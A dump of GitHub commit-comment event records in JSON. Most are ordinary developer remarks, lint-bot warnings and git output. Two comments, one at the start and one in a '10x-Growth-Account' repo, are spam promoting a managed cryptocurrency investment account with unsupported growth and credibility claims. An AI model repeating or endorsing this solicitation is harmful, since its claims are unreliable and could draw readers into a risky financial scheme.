can be opened with as little as £2000, which can be paid via Sterling, Dollar, Euro, Bitcoin or Ethereum, the 10x Growth Account accepts new account holders into its current account until the end of each month, after which that account will be closed and the funds invested in a portfolio of Cryptocurrencies,the Cryptocurrency account will be managed by a dedicated team of Analysts and Traders whose sole role is to manage the fund for maximum growth. \r\n\r\nWe will provide quarterly valuation statements, after 12 months, account holders can choose to fully withdraw their funds, partially withdraw or leave their investment in full in the account. \r\n“The 10x Growth Account really is the first Cryptocurrency Account of its kind, and will help many more people to start investing in Cryptocurrency without the worry of which coins to favour, which exchanges to use and how to invest. By opening a 10x Growth Account, people will be accessing some of the best expertise and industry insight, greatly increasing the chances of their investment in Cryptocurrency growing over the next 12 months” says David Berryman (CEO of The Easy Access Crypto Company) \r\n\r\nThe 10x Growth Account has clients from across the world that come from a variety of different professions, including ​Doctors, Professional Rugby Players, Professional Footballers, Accountants, Judges, Bankers, Property Developers, Pilots, Dentists, Financial Advisers​ and so many more! \r\n \r\nIf you want to explore this opportunity further get in contact with us now on ​0203 355 2849​ or submit your information online at ​[www.10xgrowthaccount.com](url)​ ​and a member of our team will get in contact with you ​. \r\n"}},"created_at":"2018-07-18T14:38:28Z"}
{"id":"7983406509","type":"CommitCommentEvent","actor":{"login":"Kipjr"},"repo":{"name":"VSLCatena/ldap_login"},"payload":{"comment":{"id":29750761,"position":null,"line":null,"path":null,"commit_id":"2d5313de2f19d608454a7726fc8ab75a2de6a457","created_at":"2018-07-18T14:38:35Z","updated_at":"2018-07-18T14:38:35Z","author_association":"MEMBER","body":"Possible bugfix for #3 \r\n- Included the possibility to change server type (If it worked before this version, use AD, else try OpenLDAP)\r\n  - OpenLDAP: Query over a group and compare if user is a member in that group\r\n  - AD: Query user and check memberOf.\r\n- Included a RegEx function to easily calculate the CN (needed for internal coding). Read-only in settings.\r\n- Included the possibility to change class of group (This depends on server architecture)\r\n  - posixGroup\r\n  - group\r\n- Included the possibility to change attribute for members (This depends on server architecture)\r\n  - member\r\n  - memberUid\r\n- Logs now have a timestamp, and are saved in /var/log/ "}},"created_at":"2018-07-18T14:38:35Z"}
{"id":"7983406730","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29750762,"position":null,"line":null,"path":null,"commit_id":"043101c15f5b89f5a8b30219abaeaef5cb7456b9","created_at":"2018-07-18T14:38:38Z","updated_at":"2018-07-18T14:38:38Z","author_association":"COLLABORATOR","body":"I think we have to search for something else... this denoiser is really bad."}},"created_at":"2018-07-18T14:38:38Z"}
{"id":"7983407399","type":"CommitCommentEvent","actor":{"login":"EbanSzelesi"},"repo":{"name":"EbanSzelesi/10x-Growth-Account"},"payload":{"comment":{"id":29750763,"position":2,"line":2,"path":"README.md","commit_id":"1f6dd0c3245ea8094f18172989098fa616bedf2a","created_at":"2018-07-18T14:38:45Z","updated_at":"2018-07-18T14:38:45Z","author_association":"OWNER","body":"Want to invest in Cryptocurrency, but don’t know how? \r\n\r\nThe Premier Cryptocurrency Account ‘10x Growth Account’ offers secure and easy access to Cryptocurrency, this fully managed account invests in the top 20 performing Cryptocurrencies to diversify the investment and mitigate the risk. \r\n\r\nThe 10x Growth Account is an opportunity to access the world of Cryptocurrency and benefit from a 24/7 fully managed portfolio of Cryptocurrency which is managed by a world class team of experts who have been managing Cryptocurrency portfolios since 2011. This removes the complexity surrounding Crypto investing alongside removing the difficulty of deciding what currency to buy and when, all from a fully transparent and easy to use platform, with the highest levels of security. \r\n\r\nThis opportunity provides you simple access to the world of cryptocurrency with the unique benet of a collaboration with the only UK-based Cryptocurrency exchange, providing security under UK law.  \r\nNew accounts can be opened with as little as £2000, which can be paid via Sterling, Dollar, Euro, Bitcoin or Ethereum, the 10x Growth Account accepts new account holders into its current account until the end of each month, after which that account will be closed and the funds invested in a portfolio of Cryptocurrencies,the Cryptocurrency account will be managed by a dedicated team of Analysts and Traders whose sole role is to manage the fund for maximum growth. \r\n\r\nWe will provide quarterly valuation statements, after 12 months, account holders can choose to fully withdraw their funds, partially withdraw or leave their investment in full in the account. \r\n“The 10x Growth Account really is the first Cryptocurrency Account of its kind, and will help many more people to start investing in Cryptocurrency without the worry of which coins to favour, which exchanges to use and how to invest. By opening a 10x Growth Account, people will be accessing some of the best expertise and industry insight, greatly increasing the chances of their investment in Cryptocurrency growing over the next 12 months” says David Berryman (CEO of The Easy Access Crypto Company) \r\n\r\nThe 10x Growth Account has clients from across the world that come from a variety of different professions, including ​Doctors, Professional Rugby Players, Professional Footballers, Accountants, Judges, Bankers, Property Developers, Pilots, Dentists, Financial Advisers​ and so many more! \r\n \r\nIf you want to explore this opportunity further get in contact with us now on ​0203 355 2849​ or submit your information online at ​[www.10xgrowthaccount.com](url)​ ​and a member of our team will get in contact with you ​. "}},"created_at":"2018-07-18T14:38:45Z"}
{"id":"7983411574","type":"CommitCommentEvent","actor":{"login":"squarenabla"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29750773,"position":306,"line":598,"path":"extern/official_tf_resnet/resnet_model.py","commit_id":"f3020254755b640c60d9a20f93443cc44e04fe2c","created_at":"2018-07-18T14:39:24Z","updated_at":"2018-07-18T14:39:24Z","author_association":"COLLABORATOR","body":"yes, one is slow, another is fast. I checked that "}},"created_at":"2018-07-18T14:39:24Z"}
{"id":"7983415361","type":"CommitCommentEvent","actor":{"login":"TatianaVR"},"repo":{"name":"TatianaVR/DjangoTest"},"payload":{"comment":{"id":29750784,"position":null,"line":null,"path":null,"commit_id":"99cebdcf30fb221fa48e82c07994735205117ada","created_at":"2018-07-18T14:39:59Z","updated_at":"2018-07-18T14:39:59Z","author_association":"OWNER","body":"использовала команды:\r\n\r\nC:\\Users\\W10\\PycharmProjects\\DjangoTest>git filter-branch --tree-filter \"rm -rf venv\" HEAD\r\nCannot rewrite branches: You have unstaged changes.\r\n\r\nC:\\Users\\W10\\PycharmProjects\\DjangoTest>git push origin master --force\r\nEnumerating objects: 3, done.\r\nCounting objects: 100% (3/3), done.\r\nDelta compression using up to 4 threads.\r\nCompressing objects: 100% (2/2), done.\r\nWriting objects: 100% (2/2), 282 bytes | 282.00 KiB/s, done.\r\nTotal 2 (delta 1), reused 0 (delta 0)\r\nremote: Resolving deltas: 100% (1/1), completed with 1 local object.\r\nTo https://github.com/TatianaVR/DjangoTest.git\r\n   21d1ea8..99cebdc  master -> master"}},"created_at":"2018-07-18T14:39:59Z"}
{"id":"7983415650","type":"CommitCommentEvent","actor":{"login":"zhengchangchun"},"repo":{"name":"zhengchangchun/user"},"payload":{"comment":{"id":29750786,"position":null,"line":null,"path":null,"commit_id":"f7cc96fc9a432d8abe4d6f6700254c95845fabf4","created_at":"2018-07-18T14:40:02Z","updated_at":"2018-07-18T14:40:02Z","author_association":"OWNER","body":"添加"}},"created_at":"2018-07-18T14:40:02Z"}
{"id":"7983417549","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29750790,"position":null,"line":null,"path":null,"commit_id":"c5adeec1a603483a84104fe93b427b573815fb0c","created_at":"2018-07-18T14:40:19Z","updated_at":"2018-07-18T14:40:19Z","author_association":"OWNER","body":"For the commit message: I made a last second change and added 3 mg. I simply forgot to change the commit message after amending (I updated the bench though, so it should be correct)."}},"created_at":"2018-07-18T14:40:19Z"}
{"id":"7983417981","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29750792,"position":35,"line":35,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:40:22Z","updated_at":"2018-07-18T14:40:22Z","author_association":"OWNER","body":"myvar <= soma"}},"created_at":"2018-07-18T14:40:22Z"}
{"id":"7983421955","type":"CommitCommentEvent","actor":{"login":"latermarch"},"repo":{"name":"latermarch/myproject"},"payload":{"comment":{"id":29750802,"position":null,"line":null,"path":null,"commit_id":"0902c8beacf8b0831faeb37a354a4e7b26b86692","created_at":"2018-07-18T14:41:01Z","updated_at":"2018-07-18T14:41:01Z","author_association":"OWNER","body":"aaa"}},"created_at":"2018-07-18T14:41:01Z"}
{"id":"7983426049","type":"CommitCommentEvent","actor":{"login":"alecgorge"},"repo":{"name":"Instrumental/instrumental_agent-node"},"payload":{"comment":{"id":29750813,"position":14,"line":19,"path":"test/intrumental-test.js","commit_id":"d277840524061164610cafc7230e45eb153fd442","created_at":"2018-07-18T14:41:40Z","updated_at":"2018-07-18T14:41:40Z","author_association":"CONTRIBUTOR","body":"@janxious clever solution!"}},"created_at":"2018-07-18T14:41:40Z"}
{"id":"7983426100","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29750814,"position":null,"line":null,"path":null,"commit_id":"954f829ecdad917a44a1477acf45ec8163d759d2","created_at":"2018-07-18T14:41:40Z","updated_at":"2018-07-18T14:41:40Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:264:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/berekenLSVIbasis.R#L264) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>        .data$Habitattype,   #en hier zouden extra gegevens uit Data_habitat moeten toegevoegd worden\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:96:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/invoercontroleData_soortenKenmerken.R#L96) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:109:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/invoercontroleData_soortenKenmerken.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_aantal.R:116:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_aantal.R#L116) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>setMethod(           #bij deze methode nog rekening houden met eventuele dubbels in de soortenlijst!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/selecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:482:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_1_databank.R#L482) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:483:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_1_databank.R#L483) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:485:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_berekenLSVIbasis.R#L485) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:486:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_berekenLSVIbasis.R#L486) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/954f829ecdad917a44a1477acf45ec8163d759d2/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-18T14:41:40Z"}
{"id":"7983427466","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29750815,"position":4,"line":184,"path":"Zend/zend_execute_API.c","commit_id":"3b6e1ee4ee05678b5d717cd926a35ffdc1335929","created_at":"2018-07-18T14:41:53Z","updated_at":"2018-07-18T14:41:53Z","author_association":"CONTRIBUTOR","body":"Typo persistent"}},"created_at":"2018-07-18T14:41:53Z"}
{"id":"7983427611","type":"CommitCommentEvent","actor":{"login":"gillcleerenps"},"repo":{"name":"gillcleerenps/site1"},"payload":{"comment":{"id":29750816,"position":2,"line":7,"path":"index.html","commit_id":"b59581da23341fbba30feb133f2b6142510571dd","created_at":"2018-07-18T14:41:55Z","updated_at":"2018-07-18T14:41:55Z","author_association":"OWNER","body":"test comment"}},"created_at":"2018-07-18T14:41:55Z"}
{"id":"7983431515","type":"CommitCommentEvent","actor":{"login":"AdilBikeev"},"repo":{"name":"MrGoodabrs/GameMaker"},"payload":{"comment":{"id":29750822,"position":null,"line":null,"path":null,"commit_id":"6c465464a1f8d839d0e3e58190f5c13b87ffa590","created_at":"2018-07-18T14:42:29Z","updated_at":"2018-07-18T14:42:29Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-18T14:42:29Z"}
{"id":"7983432595","type":"CommitCommentEvent","actor":{"login":"MarcosBL"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29750825,"position":null,"line":null,"path":null,"commit_id":"924962c15640db61b161b2b3ce5ceb65e947d4ce","created_at":"2018-07-18T14:42:39Z","updated_at":"2018-07-18T14:42:39Z","author_association":"NONE","body":":heart: "}},"created_at":"2018-07-18T14:42:39Z"}
{"id":"7983435138","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750831,"position":60,"line":155,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/QualifiedExpressionResolver.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:43:03Z","updated_at":"2018-07-18T14:43:03Z","author_association":"MEMBER","body":"I personally disagree with this style :)"}},"created_at":"2018-07-18T14:43:03Z"}
{"id":"7983435406","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29750832,"position":26,"line":26,"path":"gui/config/CCalibFromPlanesConfig.h","commit_id":"36e25cc00070660c90d1f6cc49709bbd05165264","created_at":"2018-07-18T14:43:06Z","updated_at":"2018-07-18T14:43:06Z","author_association":"NONE","body":"@karnikram what is the proceed function supposed to do?"}},"created_at":"2018-07-18T14:43:06Z"}
{"id":"7983435837","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750833,"position":177,"line":177,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:43:10Z","updated_at":"2018-07-18T14:43:10Z","author_association":"NONE","body":"Don't you need to make sure there are no ongoing operations before destroying the tag?"}},"created_at":"2018-07-18T14:43:10Z"}
{"id":"7983437264","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29750834,"position":null,"line":null,"path":null,"commit_id":"e032cb4189048363f87bb22670a704704dd5e7fa","created_at":"2018-07-18T14:43:22Z","updated_at":"2018-07-18T14:43:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make a way to delete an existing note](https://trello.com/c/u5VWRghr/9-make-a-way-to-delete-an-existing-note)"}},"created_at":"2018-07-18T14:43:22Z"}
{"id":"7983437304","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29750835,"position":null,"line":null,"path":null,"commit_id":"a9c3d226d40a861bc0daf9cf078bd1b4c824296a","created_at":"2018-07-18T14:43:22Z","updated_at":"2018-07-18T14:43:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make a way to delete an existing note](https://trello.com/c/u5VWRghr/9-make-a-way-to-delete-an-existing-note)"}},"created_at":"2018-07-18T14:43:22Z"}
{"id":"7983440071","type":"CommitCommentEvent","actor":{"login":"DouglasKGlover"},"repo":{"name":"DouglasKGlover/PSTCTL_V2"},"payload":{"comment":{"id":29750841,"position":null,"line":null,"path":null,"commit_id":"7e552a274a2d9a1bd91aea387536ceb846a52e7c","created_at":"2018-07-18T14:43:46Z","updated_at":"2018-07-18T14:43:46Z","author_association":"OWNER","body":"Didn't actually solve the problem. :S"}},"created_at":"2018-07-18T14:43:46Z"}
{"id":"7983444359","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29750851,"position":21,"line":73,"path":"dietpi/dietpi-ramlog","commit_id":"e85f2efa39bd7d3867f06a804149c47c45c3170e","created_at":"2018-07-18T14:44:24Z","updated_at":"2018-07-18T14:44:24Z","author_association":"OWNER","body":"@MichaIng \r\n\r\nI received an error when it was ```rm -R $FILEPATH_DIETPI_RAMLOG_SAVE```, as directory did not exist during ```cp```. \r\n\r\nBasically a failsafe to prevent any issues with no folder."}},"created_at":"2018-07-18T14:44:24Z"}
{"id":"7983448598","type":"CommitCommentEvent","actor":{"login":"akramtexas"},"repo":{"name":"akramtexas/edgex-go"},"payload":{"comment":{"id":29750861,"position":null,"line":null,"path":null,"commit_id":"2352168cccb3ab0db97e9873375b37ae87e8dd82","created_at":"2018-07-18T14:45:02Z","updated_at":"2018-07-18T14:45:02Z","author_association":"OWNER","body":"Pointing out a (slight) inaccuracy in my comment for this commit, which should have said '/notification/slug/**{slug}**' in the following segment:\r\n\r\n`(2) To '/notification/slug/{slug:}', removing the trailing symbols '.+' which cause incoming REST calls to be misrouted.`"}},"created_at":"2018-07-18T14:45:02Z"}
{"id":"7983450493","type":"CommitCommentEvent","actor":{"login":"tlsa"},"repo":{"name":"perlpunk/libyaml"},"payload":{"comment":{"id":29750871,"position":null,"line":null,"path":null,"commit_id":"a6301041c787fbb0e570e36a68a2e921366e2783","created_at":"2018-07-18T14:45:19Z","updated_at":"2018-07-18T14:45:19Z","author_association":"NONE","body":"This is OK, but I'd prefer to avoid duplicating so much of `PUT_BREAK`."}},"created_at":"2018-07-18T14:45:19Z"}
